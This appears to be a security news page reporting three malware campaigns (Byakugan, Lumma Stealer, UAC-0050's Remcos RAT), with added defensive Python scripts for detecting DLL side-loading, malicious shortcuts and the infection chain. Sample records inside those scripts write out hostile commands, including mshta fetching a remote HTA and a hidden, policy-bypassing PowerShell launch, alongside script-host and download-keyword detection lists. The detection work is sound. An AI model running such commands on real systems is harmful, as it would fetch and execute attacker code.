Bogus Adobe Acrobat Reader Installers Distribute Byakugan Malware
https://www.indiavpn.org/2024/04/05/bogus-adobe-acrobat-reader-installers-distribute-byakugan-malware/

Apr 05, 2024 | Newsroom | Malware / Endpoint Security


Bogus installers for Adobe Acrobat Reader are being used to distribute a new multi-functional malware dubbed Byakugan.

The starting point of the attack is a PDF file written in Portuguese that, when opened, shows a blurred image and asks the victim to click on a link to download the Reader application to view the content.

According to Fortinet FortiGuard Labs, clicking the URL leads to the delivery of an installer (“Reader_Install_Setup.exe”) that activates the infection sequence. Details of the campaign were first disclosed by the AhnLab Security Intelligence Center (ASEC) last month.

The attack chain leverages DLL hijacking and a Windows User Account Control (UAC) bypass to load a malicious dynamic-link library (DLL) named "BluetoothDiagnosticUtil.dll," which in turn loads the final payload. It also deploys a legitimate installer for a PDF reader, Wondershare PDFelement, alongside the malicious components.

The dropped binary gathers system metadata and exfiltrates it to a command-and-control (C2) server, then fetches the main module ("chrome.exe") from a second server that also acts as the C2 for receiving files and commands.
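Two of the behaviours in that chain are visible in ordinary endpoint telemetry: a DLL pulled from a user-writable directory into a process that otherwise looks legitimate (the hijack that loads BluetoothDiagnosticUtil.dll), and a payload that borrows the name of a trusted binary (chrome.exe) but runs from a directory where that binary never lives. The following triage script is an added example, not Fortinet or ASEC tooling. The event records are constructed in the Sysmon field style (Image, ImageLoaded, Signed), and the lists of user-writable directories and of Chrome's expected install paths are assumptions about a typical Windows layout rather than indicators from the campaign.

```python
"""Triage of constructed endpoint records for DLL side-loading and binary-name
masquerading, the two behaviours the Byakugan chain relies on.  Added example;
the records below are constructed, not captured from the campaign."""
import re

# Directories an unprivileged user can write to (assumption: typical Windows layout).
USER_WRITABLE = re.compile(
    r"^c:\\(users\\[^\\]+\\(appdata|downloads|desktop|documents)|programdata|windows\\temp)\\",
    re.I,
)

# Where a binary of a given name is expected to live; anything else is a masquerade candidate.
EXPECTED_PATHS = {
    "chrome.exe": re.compile(
        r"^c:\\(program files( \(x86\))?|users\\[^\\]+\\appdata\\local)"
        r"\\google\\chrome\\application\\chrome\.exe$",
        re.I,
    ),
}


def _dir(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower()


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_image_load(ev: dict) -> list[str]:
    """Sysmon-style ImageLoad record (Image, ImageLoaded, Signed).  Returns the
    reasons the load looks like DLL side-loading; empty when it does not."""
    loader, dll = ev["Image"], ev["ImageLoaded"]
    unsigned = ev.get("Signed", "false").lower() != "true"
    if not (USER_WRITABLE.match(dll) and unsigned):
        return []
    reasons = ["unsigned DLL loaded from a user-writable directory"]
    if _dir(loader) == _dir(dll):
        # Search-order hijacking: the DLL sits beside the executable that loaded it.
        reasons.append("DLL sits beside the loading executable")
    return reasons


def check_process_create(ev: dict) -> list[str]:
    """Sysmon-style ProcessCreate record (Image).  Flags a well-known binary
    name running from somewhere other than its install location."""
    expected = EXPECTED_PATHS.get(_name(ev["Image"]))
    if expected and not expected.match(ev["Image"]):
        return [f"{_name(ev['Image'])} running from {_dir(ev['Image'])}"]
    return []


# Constructed records: Sysmon Event 7 = ImageLoad, Event 1 = ProcessCreate.
SAMPLE_EVENTS = [
    # Installer in Downloads pulls an unsigned DLL from the same folder (hijack shape).
    {"EventID": 7,
     "Image": r"C:\Users\alice\Downloads\Reader_Install_Setup.exe",
     "ImageLoaded": r"C:\Users\alice\Downloads\BluetoothDiagnosticUtil.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    # Ordinary load of a system DLL by the real browser; benign.
    {"EventID": 7,
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    # A payload named chrome.exe started from a roaming profile directory.
    {"EventID": 1, "Image": r"C:\Users\alice\AppData\Roaming\chrome.exe"},
    # The genuine browser; benign.
    {"EventID": 1, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
]


def triage(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Run the matching check over each record; returns (index, reasons) for hits only."""
    out = []
    for i, ev in enumerate(events):
        reasons = check_image_load(ev) if ev["EventID"] == 7 else check_process_create(ev)
        if reasons:
            out.append((i, reasons))
    return out


if __name__ == "__main__":
    for i, reasons in triage(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["Image"], "->", "; ".join(reasons))
```

Against the constructed records the script flags the Downloads-folder DLL load and the AppData copy of chrome.exe and stays silent on the two genuine Chrome records. Note that Sysmon's ImageLoad event carries the signature state of the DLL, not of the loading process, so the "signed loader, unsigned DLL" pairing has to be established by joining against the ProcessCreate record of the loader if that is wanted.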

“Byakugan is a node.js-based malware packed into its executable by pkg,” security researcher Pei Han Liao said. “In addition to the main script, there are several libraries corresponding to features.”


This includes setting up persistence, monitoring the victim’s desktop using OBS Studio, capturing screenshots, downloading cryptocurrency miners, logging keystrokes, enumerating and uploading files, and grabbing data stored in web browsers.

“There is a growing trend to use both clean and malicious components in malware, and Byakugan is no exception,” Fortinet said. “This approach increases the amount of noise generated during analysis, making accurate detections more difficult.”

The disclosure comes as ASEC revealed a new campaign that propagates the Rhadamanthys information stealer under the guise of an installer for groupware.

“The threat actor created a fake website to resemble the original website and exposed the site to the users using the ad feature in search engines,” the South Korean cybersecurity firm said. “The malware in distribution uses the indirect syscall technique to hide from the eyes of security solutions.”

It also follows a discovery that a manipulated version of Notepad++ is being employed by unidentified threat actors to propagate the WikiLoader malware (aka WailingCrab).

Beware! YouTube Videos Promoting Cracked Software Distribute Lumma Stealer
https://www.indiavpn.org/2024/01/09/beware-youtube-videos-promoting-cracked-software-distribute-lumma-stealer/

Jan 09, 2024 | Newsroom | Malware / Cyber Threat


Threat actors are using YouTube videos about cracked software to entice users into downloading an information stealer called Lumma.

“These YouTube videos typically feature content related to cracked applications, presenting users with similar installation guides and incorporating malicious URLs often shortened using services like TinyURL and Cuttly,” Fortinet FortiGuard Labs researcher Cara Lin said in a Monday analysis.

This is not the first time pirated-software videos on YouTube have served as bait for stealer malware; similar attack chains have previously been observed delivering stealers, clippers, and cryptocurrency miners.


Compromised machines are thus used not only for information and cryptocurrency theft but also for illicit mining.

In the latest attack sequence documented by Fortinet, users searching for cracked versions of legitimate video editing tools like Vegas Pro on YouTube are prompted to click on a link located in the video’s description, leading to the download of a bogus installer hosted on MediaFire.


Once unpacked, the ZIP archive contains a Windows shortcut (LNK) masquerading as a setup file. The shortcut downloads a .NET loader from a GitHub repository, which in turn loads the stealer payload, but only after performing a series of anti-virtual-machine and anti-debugging checks.

Lumma Stealer, written in C and offered for sale on underground forums since late 2022, is capable of harvesting and exfiltrating sensitive data to an actor-controlled server.

The development comes as Bitdefender warned of stream-jacking attacks on YouTube in which cybercriminals take over high-profile accounts via phishing attacks that deploy the RedLine Stealer malware to siphon their credentials and session cookies, and ultimately promote various crypto scams.


It also follows the discovery of an 11-month-old AsyncRAT campaign that employs phishing lures to download an obfuscated JavaScript file that’s then utilized to drop the remote access trojan.

“The victims and their companies are carefully selected to broaden the impact of the campaign,” AT&T Alien Labs researcher Fernando Martinez said. “Some of the identified targets manage key infrastructure in the U.S.”

UAC-0050 Group Using New Phishing Tactics to Distribute Remcos RAT
https://www.indiavpn.org/2024/01/04/uac-0050-group-using-new-phishing-tactics-to-distribute-remcos-rat/

Jan 04, 2024 | Newsroom | Software Security / Malware


The threat actor known as UAC-0050 is leveraging phishing attacks to distribute Remcos RAT, using new techniques to evade detection by security software.

“The group’s weapon of choice is Remcos RAT, a notorious malware for remote surveillance and control, which has been at the forefront of its espionage arsenal,” Uptycs security researchers Karthick Kumar and Shilpesh Trivedi said in a Wednesday report.

“However, in their latest operational twist, the UAC-0050 group has integrated a pipe method for interprocess communication, showcasing their advanced adaptability.”

UAC-0050, active since 2020, has a history of targeting Ukrainian and Polish entities via social engineering campaigns that impersonate legitimate organizations to trick recipients into opening malicious attachments.


In February 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) attributed the adversary to a phishing campaign designed to deliver Remcos RAT.

Over the past few months, the same trojan has been distributed as part of at least three different phishing waves, with one such attack also leading to the deployment of an information stealer called Meduza Stealer.

The Uptycs analysis is based on an LNK file discovered on December 21, 2023. While the exact initial access vector is currently unknown, it is suspected to have involved phishing emails targeting Ukrainian military personnel that purport to advertise consultancy roles with the Israel Defense Forces (IDF).


The LNK file in question collects information regarding antivirus products installed on the target computer, and then proceeds to retrieve and execute an HTML application named “6.hta” from a remote server using mshta.exe, a Windows-native binary for running HTA files.
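Both this shortcut and the Lumma "setup" shortcut in the previous article depend on the same trick: a .lnk whose real target is a script host, handed to a user who expects an installer. The structure is documented (MS-SHLLINK), so the StringData fields that hold the target and its arguments can be pulled out without Windows and triaged before anything is double-clicked. The parser and heuristics below are an added example, not Fortinet or Uptycs tooling. The two sample shortcuts are constructed by the build_lnk() helper in the block; the URL in the malicious one is a placeholder, not an indicator from either campaign, and the list of script hosts is the author's own.

```python
"""Minimal Shell Link (.lnk) parser plus triage for shortcuts that masquerade
as installers but launch a script host.  Added example; samples are constructed."""
import struct

# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header.
HAS_LINK_TARGET_IDLIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
STRING_FIELDS = (  # StringData order is fixed by the spec
    (HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"), (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"), (HAS_ICON_LOCATION, "icon_location"),
)
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (name, relative_path, working_dir, arguments, icon_location)."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_IDLIST:          # IDListSize (2 bytes) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                   # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            fields[key] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            fields[key] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return fields


def triage_lnk(fields: dict) -> list[str]:
    """Heuristics for a shortcut that pretends to be a setup file but runs a script host."""
    findings = []
    target = (fields.get("relative_path") or "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = fields.get("arguments") or ""
    low = args.lower()
    if target in SCRIPT_HOSTS:
        findings.append(f"target is a script host or LOLBin: {target}")
    if "http://" in low or "https://" in low:
        findings.append("arguments contain a URL")
    if ".hta" in low:
        findings.append("arguments reference an HTA file")
    for kw in ("-enc", "frombase64string", "downloadstring", "invoke-expression"):
        if kw in low:
            findings.append(f"arguments contain {kw!r}")
            break
    if len(args) > 200:
        findings.append(f"unusually long argument string ({len(args)} chars)")
    return findings


def build_lnk(target: str, arguments: str) -> bytes:
    """Construct a minimal Unicode .lnk (header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = (struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
              + struct.pack("<I", 0x20)                  # FileAttributes: ARCHIVE
              + b"\x00" * 24                             # Creation/Access/Write FILETIMEs
              + struct.pack("<IIIHHII", 0, 0, 1, 0, 0, 0, 0))  # FileSize, IconIndex, ShowCommand, HotKey, Reserved1-3

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(target) + string_data(arguments)


# Constructed samples; the malicious one mirrors the mshta-with-remote-HTA shape (placeholder URL).
SAMPLE_MALICIOUS = build_lnk(r"..\..\..\Windows\System32\mshta.exe", "http://example.com/6.hta")
SAMPLE_BENIGN = build_lnk(r"..\..\Program Files\Notepad++\notepad++.exe", "")

if __name__ == "__main__":
    for label, blob in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        f = parse_lnk(blob)
        print(label, f["relative_path"], f["arguments"], triage_lnk(f) or "no findings")
```

Real shortcuts usually carry a LinkTargetIDList and LinkInfo block as well; the parser skips over both by their declared sizes, so it reaches the StringData either way. The checks are deliberately coarse: a LOLBin target, a URL or HTA reference in the arguments, and the usual PowerShell download-and-decode keywords are enough to pull a shortcut out of an archive for a closer look.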

This step paves the way for a PowerShell script that unpacks another PowerShell script to download two files called “word_update.exe” and “ofer.docx” from the domain new-tech-savvy[.]com.

Running word_update.exe causes it to create a copy of itself with the name fmTask_dbg.exe and establish persistence by creating a shortcut to the new executable in the Windows Startup folder.


The binary also uses unnamed (anonymous) pipes to exchange data with a newly spawned cmd.exe child process, ultimately decrypting and launching Remcos RAT (version 4.9.2 Pro). The RAT can harvest system data as well as cookies and login information from web browsers such as Internet Explorer, Mozilla Firefox, and Google Chrome.

“Leveraging pipes within the Windows operating system provides a covert channel for data transfer, skillfully evading detection by Endpoint Detection and Response (EDR) and antivirus systems,” the researchers said.

“Although not entirely new, this technique marks a significant leap in the sophistication of the group’s strategies.”
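The pipe itself is not something process-creation telemetry shows, but every other stage of the chain described above leaves a record: mshta.exe started with a remote URL, PowerShell spawned by mshta, a shortcut written into the Startup folder, and cmd.exe spawned by an executable living under AppData (the parent that drives it over the pipe). The correlator below runs those four rules over constructed Sysmon-style records and walks the parent chain for each hit. It is an added example, not Uptycs code. Assumptions, labelled in the block: the Sysmon field names, the AppData drop location for word_update.exe, the name of the Startup shortcut, and the placeholder URL; none of these are indicators from the report.

```python
"""Stage-by-stage detection for the UAC-0050 chain over constructed Sysmon-style
records (Event 1 = ProcessCreate, Event 11 = FileCreate).  Added example; paths,
shortcut name and URL in the sample records are assumptions, not indicators."""
import re

STARTUP_DIR = re.compile(r"\\microsoft\\windows\\start menu\\programs\\startup\\", re.I)
URL = re.compile(r"https?://\S+", re.I)
APPDATA = re.compile(r"^c:\\users\\[^\\]+\\appdata\\", re.I)


def _name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list[dict]) -> list[tuple[str, int, str]]:
    """Return (rule, ProcessId, detail) for every record that matches a stage."""
    hits = []
    for ev in events:
        if ev["EventID"] == 1:
            img, parent = _name(ev["Image"]), _name(ev["ParentImage"])
            cmd = ev.get("CommandLine", "")
            m = URL.search(cmd)
            if img == "mshta.exe" and m:                              # stage 1: remote HTA
                hits.append(("mshta_remote_hta", ev["ProcessId"], m.group(0)))
            if img in ("powershell.exe", "pwsh.exe") and parent == "mshta.exe":   # stage 2
                hits.append(("powershell_from_mshta", ev["ProcessId"], cmd))
            if img == "cmd.exe" and APPDATA.match(ev["ParentImage"]):  # stage 4: pipe-driven child
                hits.append(("cmd_child_of_appdata_binary", ev["ProcessId"], ev["ParentImage"]))
        elif ev["EventID"] == 11 and STARTUP_DIR.search(ev["TargetFilename"]):  # stage 3
            hits.append(("startup_folder_persistence", ev["ProcessId"], ev["TargetFilename"]))
    return hits


def lineage(events: list[dict], pid: int) -> list[str]:
    """Walk ParentProcessId links back as far as the records go; root first."""
    procs = {ev["ProcessId"]: ev for ev in events if ev["EventID"] == 1}
    chain = []
    while pid in procs:
        chain.append(_name(procs[pid]["Image"]))
        pid = procs[pid]["ParentProcessId"]
    return chain[::-1]


SAMPLE_EVENTS = [  # constructed
    {"EventID": 1, "ProcessId": 1000, "ParentProcessId": 900,
     "Image": r"C:\Windows\explorer.exe", "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    {"EventID": 1, "ProcessId": 4100, "ParentProcessId": 1000,
     "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://example.com/6.hta"},           # placeholder URL
    {"EventID": 1, "ProcessId": 4200, "ParentProcessId": 4100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command <stage2>"},
    {"EventID": 1, "ProcessId": 4300, "ParentProcessId": 4200,
     "Image": r"C:\Users\alice\AppData\Roaming\word_update.exe",    # drop location assumed
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "word_update.exe"},
    {"EventID": 11, "ProcessId": 4300, "Image": r"C:\Users\alice\AppData\Roaming\word_update.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fmTask_dbg.lnk"},
    {"EventID": 1, "ProcessId": 4400, "ParentProcessId": 4300,
     "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\alice\AppData\Roaming\word_update.exe",
     "CommandLine": "cmd.exe"},
    {"EventID": 1, "ProcessId": 5000, "ParentProcessId": 1000,        # benign: user opened a prompt
     "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:<30} pid={pid} {' > '.join(lineage(SAMPLE_EVENTS, pid))}  [{detail}]")
```

Each rule on its own is noisy (cmd.exe under an AppData parent is common for updaters), which is why the lineage walk matters: a cmd.exe whose ancestry runs explorer > mshta > powershell > AppData executable is worth an alert even when no single stage is. A pipe-aware check would need the handle-inheritance or ETW data the page does not describe, so the example keys off the parent/child relation instead.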
